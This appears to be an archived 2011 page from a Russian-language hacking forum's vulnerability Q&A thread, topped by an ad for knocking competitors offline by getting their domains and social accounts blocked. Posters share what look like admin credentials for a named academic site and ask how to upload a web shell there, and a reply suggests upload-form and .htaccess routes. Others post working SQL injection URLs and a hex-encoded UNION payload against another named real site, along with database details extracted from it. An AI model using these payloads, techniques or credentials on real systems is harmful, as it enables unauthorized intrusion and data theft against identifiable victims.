УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1685 из 2438

1685

Опции темы

Поиск в этой теме

Опции просмотра

#16841

26.04.2011, 19:02

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

а что непонятного?

MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)'

//для тех кому не понятно, то как бы закрыть надо её

#16842

26.04.2011, 21:39

AppS

Познающий

Регистрация: 08.08.2009

Сообщений: 37

Провел на форуме:
162650

Репутация: 2

Отправить сообщение для AppS с помощью ICQ

Вопрос такого типа, как можно перехватить пороль(узнать) имея доступ на систему (root) FreeBSD 6.3, знаю есть хеш, но он не побираеться. уже 2 недели;( читал про затроянивания ssh, но он делает только доступ. Какие есть идет по перехвату пороля узера?

#16843

27.04.2011, 00:46

assinjeans

Guest

Сообщений: n/a

Провел на форуме:
5632

Репутация: 0

подскажите как сода залить шелл

http://ptb.ib-pan.krakow.pl/admin/index.php

ptb@obpan.pl

p162002b

плз

#16844

27.04.2011, 01:29

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

Цитата:

Сообщение от assinjeans

assinjeans said:
подскажите как сода залить шелл
http://ptb.ib-pan.krakow.pl/admin/index.php
ptb@obpan.pl
p162002b
плз

создай (где нить в новостях) html форму аплоада и пробуй через /admin/upLoad.php

или залей на http://ptb.ib-pan.krakow.pl/files/ .htaccess и пробуй другие расширение...

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

#16845

27.04.2011, 16:56

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

Провел на форуме:
217423

Репутация: 32

функция mysql_connect

Наверно наивный вопрос, но все же...

Скрипт принимает данные и сразу же передает их функции mysql_connect().

По результатам ее работы устанавливается флаг об успешной или неуспешной авторизации. Можно ли в эту функцию что-то такое пихнуть (хотя бы теоретически), чтобы mysql_connect() вернула true? В 2006 году был сплоит по переполнению буфера в этой функции, но тут он не подходит.

#16846

28.04.2011, 14:30

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

//спецтема

https://forum.antichat.net/threadnav91666-1-10.html

#16847

29.04.2011, 12:20

vasykas

Guest

Сообщений: n/a

Провел на форуме:
173402

Репутация: 37

Возможно ли через PHPList шелл залить?

#16848

29.04.2011, 23:45

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12

выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...

#16849

29.04.2011, 23:56

LiRvD082

Новичок

Регистрация: 04.10.2009

Сообщений: 1

Провел на форуме:
14740

Репутация: 0

Цитата:

Сообщение от None

вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12
выводимые поля не могу оприделить

Раскрутил как BLIND!

database(): awah

@@tmpdir: /tmp

version(): 5.1.53-log

@@version_compile_os: pc-linux-gnu

user(): awah@lapstop.com.br

@@basedir: /data/mysql/zehnder/

@@datadir: /dh/mysql/ze_nder/data/

#16850

30.04.2011, 00:12

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

Цитата:

Сообщение от winstrool

winstrool said:
вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12
выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...

Код:

Code:
http://artwithaheart.us/pages.php?pid=5%20and%201=2+union+select+1,2,3,%280x3120616e6420313d3220756e696f6e2073656c65637420312c322c332c76657273696f6e2829202d2d2031%29,5,6,7,8,9,10,11,12

P.S. ну тебя же должно было смутить, что если ты пишешь в 4ое поле не число и тебе выдаёт ошибку mysql_fetch_array() то значит что этот параметр используется где-то ещё (для общего развития)

Страница 1685 из 2438

1685

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход